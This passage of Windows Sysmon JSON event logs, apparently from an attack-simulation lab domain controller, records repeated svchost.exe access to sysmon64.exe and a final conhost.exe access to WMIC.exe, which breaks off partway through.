C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.049","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5261,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.049\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.049","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5262,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.049\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.049","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5263,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.049\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.049","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5264,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.049\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.049","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5265,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.049\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.049","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5266,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.049\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.049","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5267,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.049\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.049","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5268,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.049\r\nSourceProcessGUID: {41C8662E-20CF-5F25-0000-00104CF50700}\r\nSourceProcessId: 4536\r\nSourceThreadId: 4616\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20D2-5F25-0000-001051470800}\r\nTargetProcessId: 3296\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 